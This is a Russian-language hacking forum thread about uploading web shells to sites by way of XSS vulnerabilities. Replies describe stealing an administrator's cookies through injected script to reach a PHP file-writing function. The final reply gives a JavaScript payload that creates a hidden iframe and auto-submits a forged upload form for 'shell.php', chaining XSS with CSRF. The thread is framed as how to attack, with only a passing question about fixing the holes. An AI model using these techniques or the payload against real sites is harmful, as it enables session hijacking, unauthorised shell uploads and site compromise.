Доброго времени суток все форумчане. Сегодня я задался таким вопросом "Как же всё таки заливать шеллы через xss уязвимость?" Знающих людей прошу отписаться, а так же выслушаю советы по закрытию дыр с xss уязвимостью Заранее благодарен
Имея только XSS уязвимость - никак. Однако, через XSS можно получить доступ к возможностям, использовать которые может более привилегированный пользователь.
чисто теоретически, на практике еще не проверял.... Предположим у нас есть заведомо известный движок, и мы знаем как в нем заливать шелл, к примеру есть факт редактирование файла *.php впариваем админу xss, которая спарсит у админа cookie, и с его куками пропускает до файла который производит запись файла *.php, нам остается только составить форму данных для запеси и передать скрипту.
через XSRF-уязвимость можно отправить request пример: http://forum.antichat.ru/showpost.php?p=584229&postcount=17
Имея на руках лишь XSS, без примесей, шелл залить вы не сможете. А вот при наличии XSS + CSRF в форме аплоада - уже неплохие шансы. Лить придётся как-то так... Code: <script>document.writeln('<iframe id="iframe" src="/upload.php" width="0" height="0" onload="read()"></iframe>'); function read(){ var nameF = 'C:\shell.php'; document.writeln('<form width="0" height="0" method="post" action="/upload.php">'); document.writeln('<input type="text" name="file" class="form-control" id="inputFile" value="' + nameF + '" />'); document.writeln('<input type="submit" name="submit" value="Upload" /><br/>'); document.writeln('</form>'); document.forms[0].submit.click(); } </script>
